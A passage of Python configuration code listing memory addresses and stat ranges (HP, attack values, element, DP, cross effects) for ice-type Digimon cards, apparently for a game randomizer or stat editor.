name="BlueMeramon Triangle",
addresses=[0x26671e8],
number_of_bytes=2,
min_value=Min_Triangle_Multiplier(480,ice_special_modifier,ultimate_modifier),
max_value=Max_Triangle_Multiplier(480,ice_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="BlueMeramon Cross",
addresses=[0x2667204],
number_of_bytes=2,
min_value=Min_Cross_Multiplier(360,ice_special_modifier,ultimate_modifier,4),
max_value=Max_Cross_Multiplier(360,ice_special_modifier,ultimate_modifier,4),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="BlueMeramon Cross Effect",
addresses=[0x2667290],
number_of_bytes=1,
possible_values = cross_special_effect,
is_little_endian=True,),
#Garurumon 046
Attribute(
name="Garurumon Element",
addresses=[0x2667432],
number_of_bytes=1,
min_value=Get_Element_Type(16, 2, 46),
max_value=Get_Element_Type(16, 2, 46),
is_little_endian=True, ),
Attribute(
name="Garurumon +DP",
addresses=[0x2667434],
number_of_bytes=2,
possible_values=Ten_DP_Change,
is_little_endian=True,),
Attribute(
name="Garurumon HP",
addresses=[0x2667436],
number_of_bytes=2,
min_value=Min_HP_Multiplier(1100,ice_special_modifier,champion_modifier),
max_value=Max_HP_Multiplier(1100,ice_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Garurumon Circle",
addresses=[0x2667438],
number_of_bytes=2,
min_value=Min_Circle_Multiplier(350,ice_special_modifier,champion_modifier),
max_value=Max_Circle_Multiplier(350,ice_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Garurumon Triangle",
addresses=[0x2667454],
number_of_bytes=2,
min_value=Min_Triangle_Multiplier(230,ice_special_modifier,champion_modifier),
max_value=Max_Triangle_Multiplier(230,ice_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Garurumon Cross",
addresses=[0x2667470],
number_of_bytes=2,
min_value=Min_Cross_Multiplier(0,ice_special_modifier,champion_modifier,5),
max_value=Max_Cross_Multiplier(0,ice_special_modifier,champion_modifier,5),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Garurumon Cross Effect",
addresses=[0x26674fc],
number_of_bytes=1,
possible_values = cross_special_effect,
is_little_endian=True,),
#Ikkakumon 047
Attribute(
name="Garurumon Element",
addresses=[0x266756e],
number_of_bytes=1,
min_value=Get_Element_Type(16, 2, 47),
max_value=Get_Element_Type(16, 2, 47),
is_little_endian=True, ),
Attribute(
name="Ikkakumon +DP",
addresses=[0x2667570],
number_of_bytes=2,
possible_values=Twenty_DP_Change,
is_little_endian=True,),
Attribute(
name="Ikkakumon HP",
addresses=[0x2667572],
number_of_bytes=2,
min_value=Min_HP_Multiplier(1200,ice_special_modifier,champion_modifier),
max_value=Max_HP_Multiplier(1200,ice_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Ikkakumon Circle",
addresses=[0x2667574],
number_of_bytes=2,
min_value=Min_Circle_Multiplier(340,ice_special_modifier,champion_modifier),
max_value=Max_Circle_Multiplier(340,ice_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Ikkakumon Triangle",
addresses=[0x2667590],
number_of_bytes=2,
min_value=Min_Triangle_Multiplier(250,ice_special_modifier,champion_modifier),
max_value=Max_Triangle_Multiplier(250,ice_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Ikkakumon Cross",
addresses=[0x26675ac],
number_of_bytes=2,
min_value=Min_Cross_Multiplier(200,ice_special_modifier,champion_modifier,11),
max_value=Max_Cross_Multiplier(200,ice_special_modifier,champion_modifier,11),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Ikkakumon Cross Effect",
addresses=[0x2667638],
number_of_bytes=1,
possible_values = cross_special_effect,
is_little_endian=True,),
#Dolphmon 048
Attribute(
name="Garurumon Element",
addresses=[0x26676aa],
number_of_bytes=1,
min_value=Get_Element_Type(16, 2, 48),
max_value=Get_Element_Type(16, 2, 48),
is_little_endian=True, ),
Attribute(
name="Dolphmon +DP",
addresses=[0x26676ac],
number_of_bytes=2,
possible_values=Twenty_DP_Change,
is_little_endian=True,),
Attribute(
name="Dolphmon HP",
addresses=[0x26676ae],
number_of_bytes=2,
min_value=Min_HP_Multiplier(1000,ice_special_modifier,champion_modifier),
max_value=Max_HP_Multiplier(1000,ice_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Dolphmon Circle",
addresses=[0x26676b0],
number_of_bytes=2,
min_value=Min_Circle_Multiplier(330,ice_special_modifier,champion_modifier),
max_value=Max_Circle_Multiplier(330,ice_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Dolphmon Triangle",
addresses=[0x26676cc],
number_of_bytes=2,
min_value=Min_Triangle_Multiplier(290,ice_special_modifier,champion_modifier),
max_value=Max_Triangle_Multiplier(290,ice_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Dolphmon Cross",
addresses=[0x26676e8],
number_of_bytes=2,
min_value=Min_Cross_Multiplier(200,ice_special_modifier,champion_modifier,4),
max_value=Max_Cross_Multiplier(200,ice_special_modifier,champion_modifier,4),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Dolphmon Cross Effect",
addresses=[0x2667774],
number_of_bytes=1,
possible_values = cross_special_effect,
is_little_endian=True,),
#Whamon 049
Attribute(
name="Garurumon Element",
addresses=[0x26677e6],
number_of_bytes=1,
min_value=Get_Element_Type(16, 2, 49),
max_value=Get_Element_Type(16, 2, 49),
is_little_endian=True, ),
Attribute(
name="Whamon +DP",
addresses=[0x26677e8],
number_of_bytes=2,
possible_values=Twenty_DP_Change,
is_little_endian=True,),
Attribute(
name="Whamon HP",
addresses=[0x26677ea],
number_of_bytes=2,
min_value=Min_HP_Multiplier(1300,ice_special_modifier,champion_modifier),
max_value=Max_HP_Multiplier(1300,ice_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Whamon Circle",
addresses=[0x26677ec],
number_of_bytes=2,
min_value=Min_Circle_Multiplier(340,ice_special_modifier,champion_modifier),
max_value=Max_Circle_Multiplier(340,ice_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="<NAME>",
addresses=[0x2667808],
number_of_bytes=2,
min_value=Min_Triangle_Multiplier(220,ice_special_modifier,champion_modifier),
max_value=Max_Triangle_Multiplier(220,ice_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="<NAME>",
addresses=[0x2667824],
number_of_bytes=2,
min_value=Min_Cross_Multiplier(150,ice_special_modifier,champion_modifier,3),
max_value=Max_Cross_Multiplier(150,ice_special_modifier,champion_modifier,3),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="<NAME> Effect",
addresses=[0x26678b0],
number_of_bytes=1,
possible_values = cross_special_effect,
is_little_endian=True,),
#Seadramon 050
Attribute(
name="Seadramon Element",
addresses=[0x2667922],
number_of_bytes=1,
min_value=Get_Element_Type(16, 2, 50),
max_value=Get_Element_Type(16, 2, 50),
is_little_endian=True, ),
Attribute(
name="Seadramon +DP",
addresses=[0x2667924],
number_of_bytes=2,
possible_values=Twenty_DP_Change,
is_little_endian=True,),
Attribute(
name="Seadramon HP",
addresses=[0x2667926],
number_of_bytes=2,
min_value=Min_HP_Multiplier(1150,ice_special_modifier,champion_modifier),
max_value=Max_HP_Multiplier(1150,ice_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Seadramon Circle",
addresses=[0x2667928],
number_of_bytes=2,
min_value=Min_Circle_Multiplier(360,ice_special_modifier,champion_modifier),
max_value=Max_Circle_Multiplier(360,ice_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Seadramon Triangle",
addresses=[0x2667944],
number_of_bytes=2,
min_value=Min_Triangle_Multiplier(250,ice_special_modifier,champion_modifier),
max_value=Max_Triangle_Multiplier(250,ice_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Seadramon Cross",
addresses=[0x2667960],
number_of_bytes=2,
min_value=Min_Cross_Multiplier(100,ice_special_modifier,champion_modifier,2),
max_value=Max_Cross_Multiplier(100,ice_special_modifier,champion_modifier,2),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Seadramon Cross Effect",
addresses=[0x26679ec],
number_of_bytes=1,
possible_values = cross_special_effect,
is_little_endian=True,),
#Gesomon 051
Attribute(
name="Gesomon Element",
addresses=[0x2667a5e],
number_of_bytes=1,
min_value=Get_Element_Type(16, 2, 51),
max_value=Get_Element_Type(16, 2, 51),
is_little_endian=True, ),
Attribute(
name="Gesomon +DP",
addresses=[0x2667a60],
number_of_bytes=2,
possible_values=Ten_DP_Change,
is_little_endian=True,),
Attribute(
name="Gesomon HP",
addresses=[0x2667a62],
number_of_bytes=2,
min_value=Min_HP_Multiplier(1030,ice_special_modifier,champion_modifier),
max_value=Max_HP_Multiplier(1030,ice_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Gesomon Circle",
addresses=[0x2667a64],
number_of_bytes=2,
min_value=Min_Circle_Multiplier(400,ice_special_modifier,champion_modifier),
max_value=Max_Circle_Multiplier(400,ice_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Gesomon Triangle",
addresses=[0x2667a80],
number_of_bytes=2,
min_value=Min_Triangle_Multiplier(250,ice_special_modifier,champion_modifier),
max_value=Max_Triangle_Multiplier(250,ice_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Gesomon Cross",
addresses=[0x2667a9c],
number_of_bytes=2,
min_value=Min_Cross_Multiplier(160,ice_special_modifier,champion_modifier,2),
max_value=Max_Cross_Multiplier(160,ice_special_modifier,champion_modifier,2),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Gesomon Cross Effect",
addresses=[0x2667b28],
number_of_bytes=1,
possible_values = cross_special_effect,
is_little_endian=True,),
#Frigimon 052
Attribute(
name="Frigimon Element",
addresses=[0x2667cca],
number_of_bytes=1,
min_value=Get_Element_Type(16, 2, 52),
max_value=Get_Element_Type(16, 2, 52),
is_little_endian=True, ),
Attribute(
name="Frigimon +DP",
addresses=[0x2667ccc],
number_of_bytes=2,
possible_values=Twenty_DP_Change,
is_little_endian=True,),
Attribute(
name="Frigimon HP",
addresses=[0x2667cce],
number_of_bytes=2,
min_value=Min_HP_Multiplier(990,ice_special_modifier,champion_modifier),
max_value=Max_HP_Multiplier(990,ice_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Frigimon Circle",
addresses=[0x2667cd0],
number_of_bytes=2,
min_value=Min_Circle_Multiplier(350,ice_special_modifier,champion_modifier),
max_value=Max_Circle_Multiplier(350,ice_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Frigimon Triangle",
addresses=[0x2667cec],
number_of_bytes=2,
min_value=Min_Triangle_Multiplier(200,ice_special_modifier,champion_modifier),
max_value=Max_Triangle_Multiplier(200,ice_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="<NAME>",
addresses=[0x2667d08],
number_of_bytes=2,
min_value=Min_Cross_Multiplier(170,ice_special_modifier,champion_modifier,11),
max_value=Max_Cross_Multiplier(170,ice_special_modifier,champion_modifier,11),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Gesomon Cross Effect",
addresses=[0x2667d94],
number_of_bytes=1,
possible_values = cross_special_effect,
is_little_endian=True,),
#Gekomon 053
Attribute(
name="Gekomon Element",
addresses=[0x2667e06],
number_of_bytes=1,
min_value=Get_Element_Type(16, 2, 53),
max_value=Get_Element_Type(16, 2, 53),
is_little_endian=True, ),
Attribute(
name="Gekomon +DP",
addresses=[0x2667e08],
number_of_bytes=2,
possible_values=Twenty_DP_Change,
is_little_endian=True,),
Attribute(
name="Gekomon HP",
addresses=[0x2667e0a],
number_of_bytes=2,
min_value=Min_HP_Multiplier(960,ice_special_modifier,champion_modifier),
max_value=Max_HP_Multiplier(960,ice_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Gekomon Circle",
addresses=[0x2667e0c],
number_of_bytes=2,
min_value=Min_Circle_Multiplier(340,ice_special_modifier,champion_modifier),
max_value=Max_Circle_Multiplier(340,ice_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Gekomon Triangle",
addresses=[0x2667e28],
number_of_bytes=2,
min_value=Min_Triangle_Multiplier(220,ice_special_modifier,champion_modifier),
max_value=Max_Triangle_Multiplier(220,ice_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Gekomon Cross",
addresses=[0x2667e44],
number_of_bytes=2,
min_value=Min_Cross_Multiplier(100,ice_special_modifier,champion_modifier,2),
max_value=Max_Cross_Multiplier(100,ice_special_modifier,champion_modifier,2),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Gekomon Cross Effect",
addresses=[0x2667ed0],
number_of_bytes=1,
possible_values = cross_special_effect,
is_little_endian=True,),
#Coelamon 054
Attribute(
name="Coelamon Element",
addresses=[0x2667f42],
number_of_bytes=1,
min_value=Get_Element_Type(16, 2, 54),
max_value=Get_Element_Type(16, 2, 54),
is_little_endian=True, ),
Attribute(
name="Coelamon +DP",
addresses=[0x2667f44],
number_of_bytes=2,
possible_values=Ten_DP_Change,
is_little_endian=True,),
Attribute(
name="Coelamon HP",
addresses=[0x2667f46],
number_of_bytes=2,
min_value=Min_HP_Multiplier(1270,ice_special_modifier,champion_modifier),
max_value=Max_HP_Multiplier(1270,ice_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Coelamon Circle",
addresses=[0x2667f48],
number_of_bytes=2,
min_value=Min_Circle_Multiplier(400,ice_special_modifier,champion_modifier),
max_value=Max_Circle_Multiplier(400,ice_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Coelamon Triangle",
addresses=[0x2667f64],
number_of_bytes=2,
min_value=Min_Triangle_Multiplier(290,ice_special_modifier,champion_modifier),
max_value=Max_Triangle_Multiplier(290,ice_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Coelamon Cross",
addresses=[0x2667f80],
number_of_bytes=2,
min_value=Min_Cross_Multiplier(210,ice_special_modifier,champion_modifier,2),
max_value=Max_Cross_Multiplier(210,ice_special_modifier,champion_modifier,2),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Coelamon Cross Effect",
addresses=[0x266800c],
number_of_bytes=1,
possible_values = cross_special_effect,
is_little_endian=True,),
#Mojyamon 055
Attribute(
name="Mojyamon Element",
addresses=[0x266807e],
number_of_bytes=1,
min_value=Get_Element_Type(16, 2, 55),
max_value=Get_Element_Type(16, 2, 55),
is_little_endian=True, ),
Attribute(
name="Mojyamon +DP",
addresses=[0x2668080],
number_of_bytes=2,
possible_values=Twenty_DP_Change,
is_little_endian=True,),
Attribute(
name="Mojyamon HP",
addresses=[0x2668082],
number_of_bytes=2,
min_value=Min_HP_Multiplier(980,ice_special_modifier,champion_modifier),
max_value=Max_HP_Multiplier(980,ice_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Mojyamon Circle",
addresses=[0x2668084],
number_of_bytes=2,
min_value=Min_Circle_Multiplier(370,ice_special_modifier,champion_modifier),
max_value=Max_Circle_Multiplier(370,ice_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Mojyamon Triangle",
addresses=[0x26680a0],
number_of_bytes=2,
min_value=Min_Triangle_Multiplier(290,ice_special_modifier,champion_modifier),
max_value=Max_Triangle_Multiplier(290,ice_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Mojyamon Cross",
addresses=[0x26680bc],
number_of_bytes=2,
min_value=Min_Cross_Multiplier(210,ice_special_modifier,champion_modifier,0),
max_value=Max_Cross_Multiplier(210,ice_special_modifier,champion_modifier,0),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Mojyamon Cross Effect",
addresses=[0x2668148],
number_of_bytes=1,
possible_values = cross_special_effect,
is_little_endian=True,),
#Shellmon 056
Attribute(
name="Shellmon Element",
addresses=[0x26681ba],
number_of_bytes=1,
min_value=Get_Element_Type(16, 2, 56),
max_value=Get_Element_Type(16, 2, 56),
is_little_endian=True, ),
Attribute(
name="Shellmon +DP",
addresses=[0x26681bc],
number_of_bytes=2,
possible_values=Ten_DP_Change,
is_little_endian=True,),
Attribute(
name="Shellmon HP",
addresses=[0x26681be],
number_of_bytes=2,
min_value=Min_HP_Multiplier(1250,ice_special_modifier,champion_modifier),
max_value=Max_HP_Multiplier(1250,ice_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Shellmon Circle",
addresses=[0x26681c0],
number_of_bytes=2,
min_value=Min_Circle_Multiplier(340,ice_special_modifier,champion_modifier),
max_value=Max_Circle_Multiplier(340,ice_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Shellmon Triangle",
addresses=[0x26681dc],
number_of_bytes=2,
min_value=Min_Triangle_Multiplier(200,ice_special_modifier,champion_modifier),
max_value=Max_Triangle_Multiplier(200,ice_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Shellmon Cross",
addresses=[0x26681f8],
number_of_bytes=2,
min_value=Min_Cross_Multiplier(150,ice_special_modifier,champion_modifier,2),
max_value=Max_Cross_Multiplier(150,ice_special_modifier,champion_modifier,2),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Shellmon Cross Effect",
addresses=[0x2668284],
number_of_bytes=1,
possible_values = cross_special_effect,
is_little_endian=True,),
#Sorcerimon 057
Attribute(
name="Sorcerimon Element",
addresses=[0x26682f6],
number_of_bytes=1,
min_value=Get_Element_Type(16, 2, 57),
max_value=Get_Element_Type(16, 2, 57),
is_little_endian=True, ),
Attribute(
name="Sorcerimon +DP",
addresses=[0x26682f8],
number_of_bytes=2,
possible_values=Ten_DP_Change,
is_little_endian=True,),
Attribute(
name="Sorcerimon HP",
addresses=[0x26682fa],
number_of_bytes=2,
min_value=Min_HP_Multiplier(900,ice_special_modifier,champion_modifier),
max_value=Max_HP_Multiplier(900,ice_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Sorcerimon Circle",
addresses=[0x26682fc],
number_of_bytes=2,
min_value=Min_Circle_Multiplier(440,ice_special_modifier,champion_modifier),
max_value=Max_Circle_Multiplier(440,ice_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Sorcerimon Triangle",
addresses=[0x2668318],
number_of_bytes=2,
min_value=Min_Triangle_Multiplier(370,ice_special_modifier,champion_modifier),
max_value=Max_Triangle_Multiplier(370,ice_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Sorcerimon Cross",
addresses=[0x2668334],
number_of_bytes=2,
min_value=Min_Cross_Multiplier(170,ice_special_modifier,champion_modifier,10),
max_value=Max_Cross_Multiplier(170,ice_special_modifier,champion_modifier,10),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Sorcerimon Cross Effect",
addresses=[0x26683c0],
number_of_bytes=1,
possible_values = cross_special_effect,
is_little_endian=True,),
#IceDevimon 058
Attribute(
name="IceDevimon Element",
addresses=[0x2668432],
number_of_bytes=1,
min_value=Get_Element_Type(16, 2, 58),
max_value=Get_Element_Type(16, 2, 58),
is_little_endian=True, ),
Attribute(
name="IceDevimon +DP",
addresses=[0x2668434],
number_of_bytes=2,
possible_values=Ten_DP_Change,
is_little_endian=True,),
Attribute(
name="IceDevimon HP",
addresses=[0x2668436],
number_of_bytes=2,
min_value=Min_HP_Multiplier(990,ice_special_modifier,champion_modifier),
max_value=Max_HP_Multiplier(990,ice_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="IceDevimon Circle",
addresses=[0x2668438],
number_of_bytes=2,
min_value=Min_Circle_Multiplier(390,ice_special_modifier,champion_modifier),
max_value=Max_Circle_Multiplier(390,ice_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="IceDevimon Triangle",
addresses=[0x2668454],
number_of_bytes=2,
min_value=Min_Triangle_Multiplier(290,ice_special_modifier,champion_modifier),
max_value=Max_Triangle_Multiplier(290,ice_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="IceDevimon Cross",
addresses=[0x2668470],
number_of_bytes=2,
min_value=Min_Cross_Multiplier(180,ice_special_modifier,champion_modifier,11),
max_value=Max_Cross_Multiplier(180,ice_special_modifier,champion_modifier,11),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="IceDevimon Cross Effect",
addresses=[0x266862C],
number_of_bytes=1,
possible_values = cross_special_effect,
is_little_endian=True,),
#Hyogamon 059
Attribute(
name="Hyogamon Element",
addresses=[0x266869E],
number_of_bytes=1,
min_value=Get_Element_Type(16, 2, 59),
max_value=Get_Element_Type(16, 2, 59),
is_little_endian=True, ),
Attribute(
name="Hyogamon +DP",
addresses=[0x26686a0],
number_of_bytes=2,
possible_values=Ten_DP_Change,
is_little_endian=True,),
Attribute(
name="Hyogamon HP",
addresses=[0x26686a2],
number_of_bytes=2,
min_value=Min_HP_Multiplier(1200,ice_special_modifier,champion_modifier),
max_value=Max_HP_Multiplier(1200,ice_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Hyogamon Circle",
addresses=[0x26686a4],
number_of_bytes=2,
min_value=Min_Circle_Multiplier(460,ice_special_modifier,champion_modifier),
max_value=Max_Circle_Multiplier(460,ice_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Hyogamon Triangle",
addresses=[0x26686c0],
number_of_bytes=2,
min_value=Min_Triangle_Multiplier(250,ice_special_modifier,champion_modifier),
max_value=Max_Triangle_Multiplier(250,ice_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Hyogamon Cross",
addresses=[0x26686dc],
number_of_bytes=2,
min_value=Min_Cross_Multiplier(0,ice_special_modifier,champion_modifier,5),
max_value=Max_Cross_Multiplier(0,ice_special_modifier,champion_modifier,5),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Hyogamon Cross Effect",
addresses=[0x2668768],
number_of_bytes=1,
possible_values = cross_special_effect,
is_little_endian=True,),
#Icemon 060
Attribute(
name="Icemon Element",
addresses=[0x26687da],
number_of_bytes=1,
min_value=Get_Element_Type(16, 2, 60),
max_value=Get_Element_Type(16, 2, 60),
is_little_endian=True, ),
Attribute(
name="Icemon +DP",
addresses=[0x26687dc],
number_of_bytes=2,
possible_values=Twenty_DP_Change,
is_little_endian=True,),
Attribute(
name="Icemon HP",
addresses=[0x26687de],
number_of_bytes=2,
min_value=Min_HP_Multiplier(1140,ice_special_modifier,champion_modifier),
max_value=Max_HP_Multiplier(1140,ice_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Icemon Circle",
addresses=[0x26687e0],
number_of_bytes=2,
min_value=Min_Circle_Multiplier(370,ice_special_modifier,champion_modifier),
max_value=Max_Circle_Multiplier(370,ice_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Icemon Triangle",
addresses=[0x26687fc],
number_of_bytes=2,
min_value=Min_Triangle_Multiplier(240,ice_special_modifier,champion_modifier),
max_value=Max_Triangle_Multiplier(240,ice_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Icemon Cross",
addresses=[0x2668818],
number_of_bytes=2,
min_value=Min_Cross_Multiplier(0,ice_special_modifier,champion_modifier,7),
max_value=Max_Cross_Multiplier(0,ice_special_modifier,champion_modifier,7),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Icemon Cross Effect",
addresses=[0x26688a4],
number_of_bytes=1,
possible_values = cross_special_effect,
is_little_endian=True,),
#Gomamon 061
Attribute(
name="Gomamon Element",
addresses=[0x2668916],
number_of_bytes=1,
min_value=Get_Element_Type(16, 0, 61),
max_value=Get_Element_Type(16, 0, 61),
is_little_endian=True, ),
Attribute(
name="Gomamon +DP",
addresses=[0x2668918],
number_of_bytes=2,
possible_values=Twenty_DP_Change,
is_little_endian=True,),
Attribute(
name="Gomamon HP",
addresses=[0x266891a],
number_of_bytes=2,
min_value=Min_HP_Multiplier(700,ice_special_modifier,rookie_modifier),
max_value=Max_HP_Multiplier(700,ice_special_modifier,rookie_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Gomamon Circle",
addresses=[0x266891c],
number_of_bytes=2,
min_value=Min_Circle_Multiplier(300,ice_special_modifier,rookie_modifier),
max_value=Max_Circle_Multiplier(300,ice_special_modifier,rookie_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Gomamon Triangle",
addresses=[0x2668938],
number_of_bytes=2,
min_value=Min_Triangle_Multiplier(240,ice_special_modifier,rookie_modifier),
max_value=Max_Triangle_Multiplier(240,ice_special_modifier,rookie_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Gomamon Cross",
addresses=[0x2668954],
number_of_bytes=2,
min_value=Min_Cross_Multiplier(200,ice_special_modifier,rookie_modifier,3),
max_value=Max_Cross_Multiplier(200,ice_special_modifier,rookie_modifier,3),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Gomamon Cross Effect",
addresses=[0x26689e0],
number_of_bytes=1,
possible_values = cross_special_effect,
is_little_endian=True,),
#Gabumon 062
Attribute(
name="Gabumon Element",
addresses=[0x2668a52],
number_of_bytes=1,
min_value=Get_Element_Type(16, 0, 62),
max_value=Get_Element_Type(16, 0, 62),
is_little_endian=True, ),
Attribute(
name="Gabumon +DP",
addresses=[0x2668a54],
number_of_bytes=2,
possible_values=Twenty_DP_Change,
is_little_endian=True,),
Attribute(
name="Gabumon HP",
addresses=[0x2668a56],
number_of_bytes=2,
min_value=Min_HP_Multiplier(680,ice_special_modifier,rookie_modifier),
max_value=Max_HP_Multiplier(680,ice_special_modifier,rookie_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Gabumon Circle",
addresses=[0x2668a58],
number_of_bytes=2,
min_value=Min_Circle_Multiplier(350,ice_special_modifier,rookie_modifier),
max_value=Max_Circle_Multiplier(350,ice_special_modifier,rookie_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Gabumon Triangle",
addresses=[0x2668a74],
number_of_bytes=2,
min_value=Min_Triangle_Multiplier(220,ice_special_modifier,rookie_modifier),
max_value=Max_Triangle_Multiplier(220,ice_special_modifier,rookie_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Gabumon Cross",
addresses=[0x2668a90],
number_of_bytes=2,
min_value=Min_Cross_Multiplier(140,ice_special_modifier,rookie_modifier,2),
max_value=Max_Cross_Multiplier(140,ice_special_modifier,rookie_modifier,2),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Gabumon Cross Effect",
addresses=[0x2668b1c],
number_of_bytes=1,
possible_values = cross_special_effect,
is_little_endian=True,),
#Betamon 063
Attribute(
name="Betamon Element",
addresses=[0x2668b8e],
number_of_bytes=1,
min_value=Get_Element_Type(16, 0, 63),
max_value=Get_Element_Type(16, 0, 63),
is_little_endian=True, ),
Attribute(
name="Betamon +DP",
addresses=[0x2668b90],
number_of_bytes=2,
possible_values=Twenty_DP_Change,
is_little_endian=True,),
Attribute(
name="Betamon HP",
addresses=[0x2668b92],
number_of_bytes=2,
min_value=Min_HP_Multiplier(730,ice_special_modifier,rookie_modifier),
max_value=Max_HP_Multiplier(730,ice_special_modifier,rookie_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Betamon Circle",
addresses=[0x2668b94],
number_of_bytes=2,
min_value=Min_Circle_Multiplier(300,ice_special_modifier,rookie_modifier),
max_value=Max_Circle_Multiplier(300,ice_special_modifier,rookie_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Betamon Triangle",
addresses=[0x2668bb0],
number_of_bytes=2,
min_value=Min_Triangle_Multiplier(190,ice_special_modifier,rookie_modifier),
max_value=Max_Triangle_Multiplier(190,ice_special_modifier,rookie_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Betamon Cross",
addresses=[0x2668bcc],
number_of_bytes=2,
min_value=Min_Cross_Multiplier(170,ice_special_modifier,rookie_modifier,2),
max_value=Max_Cross_Multiplier(170,ice_special_modifier,rookie_modifier,2),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Betamon Cross Effect",
addresses=[0x2668c58],
number_of_bytes=1,
possible_values = cross_special_effect,
is_little_endian=True,),
#Penguinmon 064
Attribute(
name="Penguinmon Element",
addresses=[0x2668cca],
number_of_bytes=1,
min_value=Get_Element_Type(16, 0, 64),
max_value=Get_Element_Type(16, 0, 64),
is_little_endian=True, ),
Attribute(
name="Penguinmon +DP",
addresses=[0x2668ccc],
number_of_bytes=2,
possible_values=Twenty_DP_Change,
is_little_endian=True,),
Attribute(
name="Penguinmon HP",
addresses=[0x2668cce],
number_of_bytes=2,
min_value=Min_HP_Multiplier(670,ice_special_modifier,rookie_modifier),
max_value=Max_HP_Multiplier(670,ice_special_modifier,rookie_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Penguinmon Circle",
addresses=[0x2668cd0],
number_of_bytes=2,
min_value=Min_Circle_Multiplier(320,ice_special_modifier,rookie_modifier),
